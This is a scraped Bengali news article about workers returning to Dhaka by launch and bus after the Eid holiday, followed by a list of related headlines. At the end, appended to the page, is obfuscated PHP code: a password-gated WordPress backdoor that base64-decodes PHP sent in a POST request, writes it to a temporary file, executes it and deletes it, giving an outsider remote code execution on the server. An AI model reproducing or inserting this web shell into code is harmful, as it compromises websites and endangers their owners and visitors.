শনিবার, ২২শে জুন, ২০২৪ খ্রিস্টাব্দ ৮ই আষাঢ়, ১৪৩১ বঙ্গাব্দ

ঈদ শেষে ঢাকা ফিরতে শুরু করেছে সাধারণ মানুষ

news-image

নিউজ ডেস্ক।। ঈদুল ফিতরের ছুটি শেষে কর্মস্থল ঢাকায় ফিরমে শুরু করেছে কর্মজীবী ও সাধারন মানুষ। ঈদের ছুটি উপলক্ষে শেষ অফিস ছিল গত বৃহস্পতিবার। অফিস করেই অনেকে ওইদিনই চলে গেছেন গ্রামের বাড়িতে। পরিবার পরিজনদের সঙ্গে ঈদের আনন্দ ভাগাভাগির করতে শত ভোগান্তি পেরিয়েও ছুটে গেছেন তারা। কর্মজীবী এসব মানুষ ঢাকায় ফিরে আবারও যোগ দেবেন নিজ নিজ কর্মে, প্রাণ ফিরে পাবে ঈদের ছুটিতে ফাঁকা হয়ে যাওয়া ঢাকাও। তবে এ অবস্থা চেখে পড়েছে গাবতলী ও সায়দাবাদের বাড় স্ট্যান্ডেও।

এবার ঈদের ছুটি ছিল মোট তিনদিন। এর মধ্যে দুদিনই সাপ্তাহিক ছুটির দিন (শুক্র ও শনিবার) ছিল। ফলে ঈদের ছুটি বলতে শুধু রোববার একদিনই পেয়েছেন সরকারি চাকরিজীবীরা। তবে অনেকে আবার অতিরিক্ত ছুটি নিয়েছেন।

রাজধানীর সঙ্গে দক্ষিণাঞ্চলের মানুষের যোগাযোগের অন্যতম মাধ্যম হচ্ছে নৌ রুট। সড়ক ও আকাশ পথে যোগাযোগ ব্যবস্থা থাকলেও অধিকাংশই লঞ্চে যাতায়াত করতে স্বাচ্ছ্যন্দবোধ করেন। তবে এখনও চিরচেনা রূপ ফিরে পায়নি সদরঘাট লঞ্চ টার্মিনাল।

সোমবার ভোরে সদরঘাট লঞ্চ টার্মিনালে দেখা যায়, ঘাটে লঞ্চ ভেড়ানো, তবে বাইরে তেমন লোক সমাগম নেই। টার্মিনালের বাইরের সড়কে বিভিন্ন গন্তব্যের যানবাহন অপেক্ষায় করছে। টার্মিনালের ভেতরে প্রবেশ করে কয়েকজন দেখতে পাওয়া যায়। তাদের সঙ্গে কথা বলে জানা যায়, ভোর রাত তিনটা থেকে সাড়ে তিনটার দিকে বেশ কয়েকটি লঞ্চ ঘাটে ভিড়েছে। দিনের আলো ফোটার পর যাত্রীরা লঞ্চ থেকে বের হয়েছেন।

রবিশাল ফেরত একাধিক কর্মজীকা জানান, তারা অধিকাংশই শেষ অফিস করে বৃহস্পতিবারই গ্রামের বাড়ির উদ্দেশ্যে ঢাকা ছেড়ে ছিলেন। ওইদিন খুব ভিড় ছিল, রোজা রেখে লঞ্চে উঠতে কষ্ট হয়েছিল। তবে কোনো সমস্যা হয় নাই। ভালোভাবে ঈদ করে ঢাকায় ফিরছি। বেঁচে থাকার তাগিদে ঢাকায় ফিরেছের যোগ দেবেন কাজে।

সদরঢাটের পোর্ট অভিসার আলমগীর কবীর টেলিফোনে জানান, দক্ষিণাঞ্চলের ৪০ টি রুট থেকে প্রায় ৮৫ াট লঞ্চ ফাকায় এসেছে। তবে যাত্রীদেরভরি একটু কম ছিল। তবে যারা দেশে ড়িয়েছেন তাদের মধ্য থেকে পুরুষ কর্মজীবীরাই ফিরতে শুরু করেছেন। পরিবার নিয়ে এখন খুব কম মানুষই ঢাকা ফিরছেন।

বাংলাদেশ্য অভ্যন্তরীন নৌ পরিবহন কর্তৃপক্ষের সদরঘাট টার্মিনালে কর্তব্যরতরা জানান, সোমবার ভোর থেকে ঈদ ফিরতি লঞ্চযাত্রীরা ঢাকায় আসা শুরু করেছেন। যাত্রীদের উপচেপড়া ভিড় নেই। তবে কাল (মঙ্গলবর) থেকে ভিড় বাড়বে। কারণ, ঈদে বাড়ি ফেরা মানুষের বড় একটা অংশ এখনও ছুটিতে রয়েছেন।

বিভিন্ন বাস মালিক ও বাসের কর্মচারীদের সঙ্গে কথা বলে জানাগেছে, গাড়ীতে চাপ কম হলেও কোনো সিট ফাঁকা থাকছে না। যারা অতিরিক্ত ছুটি নিয়ে গেছেন তারা একটু দেরিতে ঢাকা ফিরবেন। অপরদিকে যাদের ছুটি নেই তারা আজ থেকে ঢাকা ফিরতে শুরু করছেন। আগামী শনিবারের মধ্যে ঢাকা তার স্বাভাবিক চরিত্র ফিরে পাবে।

এ জাতীয় আরও খবর

গোপালগঞ্জে ‘কথা বলা’ গাছের পেছনে ছুটছে মানুষ!

১১ ওভারে ১৩০ করে রান রেট বাড়িয়ে নিল উইন্ডিজ

ছয় মাসের অন্তঃসত্ত্বা দীপিকা, বেবিবাম্প নিয়ে এলেন প্রকাশ্যে

বেশি মাংসে স্বাস্থ্যঝুঁকি

সানিয়া-শামির বিয়ের গুঞ্জন, মুখ খুললেন টেনিস সুন্দরীর বাবা

সকালেই এক পশলা বৃষ্টিতে ভিজল ঢাকা

পবিত্র হজ পালন শেষে দেশে ফিরেছেন ৩৯২০ জন‌, ৩৫ হাজীর মৃত্যু

গান ছাড়া জীবন অচল অভিনেত্রী মিমির!

বিচ্ছেদ লড়াইয়ের মাঝে সন্তান চাইলেন ব্রাড পিট

গোল মিসের মহড়া: অপেক্ষা বাড়ল ফ্রান্স ও ডাচদের

গাজায় রেড ক্রিসেন্ট দপ্তরের কাছে হামলা, নিহত ২২

অংশীদারত্বের উন্নয়নে প্রধানমন্ত্রীর নির্দেশনার প্রশংসা জয়শঙ্ক‌রের

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}